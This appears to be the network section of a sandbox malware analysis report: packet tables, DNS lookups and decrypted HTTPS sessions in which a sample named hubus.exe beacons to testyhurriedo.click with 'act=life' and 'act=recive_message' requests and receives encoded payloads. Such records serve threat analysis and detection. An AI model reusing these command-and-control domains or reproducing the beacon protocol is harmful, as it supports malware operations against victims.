                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.548695087 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.548715115 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.548883915 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.548914909 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549078941 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549098015 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549328089 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549381018 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549494028 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549519062 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549702883 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549727917 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549860954 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.549879074 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550121069 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550173998 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550241947 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550263882 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550503016 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550554991 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550652981 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550678968 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550822020 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.550841093 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.551024914 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.551269054 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.551430941 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.551611900 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.551804066 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.551974058 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.552174091 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.552402973 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.552576065 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.552722931 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.552918911 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.553108931 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.553304911 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.553536892 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.553725004 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.594264984 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.090277910 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.090540886 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.090733051 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.090945005 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.090986013 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.093446970 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.093503952 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.093903065 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.094130993 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.094156981 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.378784895 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.379009962 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.379895926 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.379930019 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.380553961 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.381756067 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.381756067 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.381927013 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.933032990 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.933300972 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.933490992 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.933604956 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.933604956 CET49766443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.933645964 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.933662891 CET44349766104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:46.159435034 CET49741443192.168.11.2023.39.228.7
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:46.736316919 CET4974280192.168.11.20199.232.214.172
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:46.877023935 CET8049742199.232.214.172192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:46.877180099 CET8049742199.232.214.172192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:46.877402067 CET4974280192.168.11.20199.232.214.172
                                                                                                                                                                                                                                                            Dec 20, 2024 00:59:35.990319014 CET4974380192.168.11.20173.194.219.94
                                                                                                                                                                                                                                                            Dec 20, 2024 00:59:36.132675886 CET8049743173.194.219.94192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:59:36.132961988 CET4974380192.168.11.20173.194.219.94

                                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Dec 20, 2024 00:57:59.071805000 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:57:59.822175980 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:00.587579966 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:05.869985104 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:06.626003981 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:07.391539097 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.644306898 CET6063653192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET53606361.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.134309053 CET53527701.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.150954962 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.188277006 CET53557721.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.223495007 CET5581453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.223579884 CET5496053192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.359985113 CET53549601.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET53558141.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.132028103 CET53630141.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.159733057 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:30.164916039 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:31.177436113 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:31.749910116 CET53533501.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.934640884 CET5538153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:43.093311071 CET53553811.1.1.1192.168.11.20

                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.644306898 CET192.168.11.201.1.1.10xaceeStandard query (0)testyhurriedo.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.223495007 CET192.168.11.201.1.1.10xffbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.223579884 CET192.168.11.201.1.1.10xe4a6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.934640884 CET192.168.11.201.1.1.10x713Standard query (0)klipcatepiu0.shopA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET1.1.1.1192.168.11.200xaceeNo error (0)testyhurriedo.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET1.1.1.1192.168.11.200xaceeNo error (0)testyhurriedo.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET1.1.1.1192.168.11.200xaceeNo error (0)testyhurriedo.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET1.1.1.1192.168.11.200xaceeNo error (0)testyhurriedo.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET1.1.1.1192.168.11.200xaceeNo error (0)testyhurriedo.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET1.1.1.1192.168.11.200xaceeNo error (0)testyhurriedo.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET1.1.1.1192.168.11.200xaceeNo error (0)testyhurriedo.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.359985113 CET1.1.1.1192.168.11.200xe4a6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET1.1.1.1192.168.11.200xffbNo error (0)www.google.com172.253.124.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET1.1.1.1192.168.11.200xffbNo error (0)www.google.com172.253.124.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET1.1.1.1192.168.11.200xffbNo error (0)www.google.com172.253.124.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET1.1.1.1192.168.11.200xffbNo error (0)www.google.com172.253.124.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET1.1.1.1192.168.11.200xffbNo error (0)www.google.com172.253.124.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET1.1.1.1192.168.11.200xffbNo error (0)www.google.com172.253.124.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:43.093311071 CET1.1.1.1192.168.11.200x713Name error (3)klipcatepiu0.shopnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                                            • testyhurriedo.click
                                                                                                                                                                                                                                                            • www.google.com

                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.11.2049744104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:24 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2024-12-19 23:58:24 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:24 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=8k3pl8uldl92e6gdehhvg326ce; expires=Mon, 14 Apr 2025 17:45:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o1V%2BfO0EIpmo3lc0%2FuU2brPn5N7pSzMISDBJ6RpK811JqB3Z%2BOMsvTY8H%2BZxnrbXSvhfiRnQnOeVP9ifjr%2BQ0cDL%2FTVesn82fR9dWu8WOp9pcGgiMwNfdSAaDqmW9tZghSvTmWoS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b572a2b3432ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=134997&min_rtt=134857&rtt_var=28562&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=28395&cwnd=252&unsent_bytes=0&cid=44c22b2db849b695&ts=666&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2024-12-19 23:58:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.11.2049745104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 48
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--SHELLS&j=
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:25 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=dlq2pcao0r1cr1hb8mn1ijmm2r; expires=Mon, 14 Apr 2025 17:45:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kqD02Roz9G4LWQOT0lq3FPJMkze%2FPrW%2BOl1dC8PNxZCgLwRzkRIaK4zJ%2F%2BH0oZjFWWT%2BY3lMfXicjdU140ZtoZHZ%2BiDFSFQWFTvIGsvb2oGSMJkeUunQgtXh76sXmUjUb%2FiVKLdq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57301def32f5-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135086&min_rtt=135004&rtt_var=28614&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=951&delivery_rate=28307&cwnd=252&unsent_bytes=0&cid=fccf8b26ead3a930&ts=730&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC232INData Raw: 32 64 35 37 0d 0a 54 30 73 7a 4e 53 44 4a 74 53 39 30 74 61 49 37 75 6d 4d 6a 31 45 4f 41 4b 55 68 4a 6b 79 68 31 62 4b 77 50 71 6d 31 75 4e 46 4d 30 61 55 55 58 47 76 32 5a 44 51 66 51 67 41 48 4f 45 56 61 78 62 36 4a 49 4c 47 75 70 54 68 51 41 33 32 71 47 54 78 68 5a 63 58 55 74 55 6c 6c 54 72 4a 6b 4e 45 63 32 41 41 65 45 59 41 62 45 74 6f 68 4e 71 4c 50 6c 4b 46 41 44 4f 62 73 45 43 48 6c 67 77 4a 79 64 55 58 55 57 71 30 55 34 59 32 4d 64 65 33 77 4a 4a 75 69 72 74 51 53 56 72 76 77 6f 51 46 6f 34 31 69 43 41 4c 51 44 49 43 4b 6b 42 65 41 72 53 5a 56 46 62 51 7a 42 6d 41 51 55 4b 78 49 65 78 50 4c 43 4c 37 51 42 30 49 7a 32 76 41 48 51 64 53 4f 79 63 70 56 31 78 50 6f 38 56 44 45 74
                                                                                                                                                                                                                                                            Data Ascii: 2d57T0szNSDJtS90taI7umMj1EOAKUhJkyh1bKwPqm1uNFM0aUUXGv2ZDQfQgAHOEVaxb6JILGupThQA32qGTxhZcXUtUllTrJkNEc2AAeEYAbEtohNqLPlKFADObsECHlgwJydUXUWq0U4Y2Mde3wJJuirtQSVrvwoQFo41iCALQDICKkBeArSZVFbQzBmAQUKxIexPLCL7QB0Iz2vAHQdSOycpV1xPo8VDEt
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC1369INData Raw: 2f 4d 57 4e 55 43 41 66 68 68 35 56 4e 71 63 37 45 5a 4a 51 33 66 66 4e 30 43 48 46 42 78 4d 6d 64 49 46 30 57 6e 6c 78 56 57 33 38 78 58 33 51 4a 4f 73 53 44 69 57 53 55 72 38 6b 49 66 43 73 52 69 78 77 41 43 58 44 59 6c 49 46 5a 59 52 61 50 52 51 68 57 58 6a 68 6e 66 47 51 48 75 59 63 4a 62 4b 53 6a 6c 52 77 5a 4f 30 53 50 52 54 77 74 61 63 58 56 70 56 31 6c 44 70 74 64 66 48 74 7a 4c 58 4d 6f 4b 53 4c 73 73 34 6b 59 67 4a 50 4a 4b 45 41 54 45 59 73 49 4c 41 56 73 33 4c 53 6b 52 47 51 4b 73 7a 77 31 4f 6c 2b 4e 63 79 41 5a 4e 6f 47 50 59 43 7a 56 6c 36 41 6f 51 41 6f 34 31 69 41 63 4a 56 54 49 6d 4a 6c 4a 66 53 62 6e 58 58 78 44 61 78 55 76 65 42 45 2b 38 49 76 42 42 4a 43 33 79 51 78 77 48 79 32 72 4d 54 30 49 57 4e 6a 56 70 43 52 64 6a 70 74 78 42 48
                                                                                                                                                                                                                                                            Data Ascii: /MWNUCAfhh5VNqc7EZJQ3ffN0CHFBxMmdIF0WnlxVW38xX3QJOsSDiWSUr8kIfCsRixwACXDYlIFZYRaPRQhWXjhnfGQHuYcJbKSjlRwZO0SPRTwtacXVpV1lDptdfHtzLXMoKSLss4kYgJPJKEATEYsILAVs3LSkRGQKszw1Ol+NcyAZNoGPYCzVl6AoQAo41iAcJVTImJlJfSbnXXxDaxUveBE+8IvBBJC3yQxwHy2rMT0IWNjVpCRdjptxBH
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC1369INData Raw: 53 45 31 4f 32 4c 66 42 48 49 43 33 2b 52 78 74 4f 67 43 33 50 46 30 77 4f 63 51 63 71 52 56 52 49 36 65 4a 4f 47 4e 6e 48 54 35 67 65 44 36 39 68 35 55 64 71 63 37 46 48 46 67 62 49 66 38 63 43 44 31 67 2f 49 69 78 65 58 30 4b 72 32 6b 67 53 33 4d 74 61 31 51 56 54 76 43 48 71 54 69 73 68 2b 77 70 5a 54 73 6c 31 69 46 64 4d 5a 79 59 6d 61 32 52 55 54 4b 58 51 57 31 62 49 6a 6b 43 59 42 6b 33 32 65 61 4a 47 49 69 37 30 52 52 59 45 77 47 6a 43 41 77 52 59 4d 6a 38 6d 56 56 64 4f 6f 39 31 41 47 4e 50 49 55 4e 4d 4b 52 37 59 67 36 41 74 6b 61 2f 5a 53 56 31 61 4f 57 63 38 44 41 56 6c 7a 47 43 70 66 57 55 57 39 6c 31 4a 59 7a 6f 42 65 31 45 45 5a 39 69 33 72 53 79 45 68 39 55 6f 51 41 38 74 75 7a 77 77 42 55 54 73 6a 4c 6c 56 62 53 36 62 52 54 52 48 54 78 55
                                                                                                                                                                                                                                                            Data Ascii: SE1O2LfBHIC3+RxtOgC3PF0wOcQcqRVRI6eJOGNnHT5geD69h5Udqc7FHFgbIf8cCD1g/IixeX0Kr2kgS3Mta1QVTvCHqTish+wpZTsl1iFdMZyYma2RUTKXQW1bIjkCYBk32eaJGIi70RRYEwGjCAwRYMj8mVVdOo91AGNPIUNMKR7Yg6Atka/ZSV1aOWc8DAVlzGCpfWUW9l1JYzoBe1EEZ9i3rSyEh9UoQA8tuzwwBUTsjLlVbS6bRTRHTxU
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC1369INData Raw: 39 69 72 58 52 54 78 72 37 67 51 4f 54 73 6c 68 69 46 64 4d 58 7a 67 2f 4a 31 39 65 54 36 33 66 53 68 6a 61 79 31 2f 54 42 6b 61 77 4c 4f 70 47 4c 79 6a 77 54 68 30 63 7a 57 62 43 41 67 59 57 66 32 30 75 53 52 63 61 36 2f 42 42 50 38 66 62 53 38 35 42 58 76 67 34 6f 6b 77 6d 61 36 6b 4b 46 41 48 48 59 73 41 48 41 31 6b 31 49 79 39 58 57 6b 65 6b 33 56 38 65 32 63 31 53 31 77 70 54 74 69 7a 6d 52 79 34 6a 2b 6b 42 58 51 49 35 71 30 45 39 55 46 67 51 67 4a 6c 46 55 56 4f 76 49 41 77 2b 58 78 31 57 59 57 51 47 36 4c 2b 4a 45 4a 69 66 36 51 68 59 43 77 47 72 4e 42 67 52 65 49 79 77 74 57 56 5a 4d 70 4e 5a 4a 45 39 4c 45 58 74 77 48 54 76 5a 76 6f 6b 77 79 61 36 6b 4b 4f 43 6e 37 4c 2b 6b 31 54 45 6c 2f 4e 47 6c 57 57 77 4c 7a 6c 30 45 56 32 38 68 57 33 67 68
                                                                                                                                                                                                                                                            Data Ascii: 9irXRTxr7gQOTslhiFdMXzg/J19eT63fShjay1/TBkawLOpGLyjwTh0czWbCAgYWf20uSRca6/BBP8fbS85BXvg4okwma6kKFAHHYsAHA1k1Iy9XWkek3V8e2c1S1wpTtizmRy4j+kBXQI5q0E9UFgQgJlFUVOvIAw+Xx1WYWQG6L+JEJif6QhYCwGrNBgReIywtWVZMpNZJE9LEXtwHTvZvokwya6kKOCn7L+k1TEl/NGlWWwLzl0EV28hW3gh
                                                                                                                                                                                                                                                            2024-12-19 23:58:25 UTC1369INData Raw: 67 73 67 49 50 56 4a 45 77 76 42 62 4d 6b 4a 48 6c 45 34 50 79 64 63 57 45 71 6a 33 6b 77 53 30 73 31 66 31 41 74 41 73 53 2f 73 51 32 70 6c 73 55 30 50 54 70 59 74 36 52 38 58 52 43 63 67 43 46 78 59 41 72 53 5a 56 46 62 51 7a 42 6d 41 51 55 69 6b 4a 65 39 5a 49 79 7a 2f 52 52 51 63 7a 32 44 44 48 51 74 5a 4e 53 6f 6c 56 31 68 45 71 74 4a 48 47 74 44 46 55 74 63 4e 41 66 68 68 35 56 4e 71 63 37 46 6b 48 42 33 5a 62 73 59 45 47 6b 31 78 4d 6d 64 49 46 30 57 6e 6c 78 56 57 31 4d 74 53 33 41 46 4e 74 69 58 76 53 7a 67 6b 39 6b 30 65 42 64 78 6e 7a 77 67 48 58 6a 6f 69 4c 30 4e 62 54 4c 6e 53 58 77 53 58 6a 68 6e 66 47 51 48 75 59 64 52 4d 4f 6a 76 79 43 43 59 59 7a 58 76 44 41 67 41 57 4c 6d 4d 77 45 56 42 4f 36 34 38 4e 45 4e 6a 4a 57 74 63 41 53 4c 6f 73
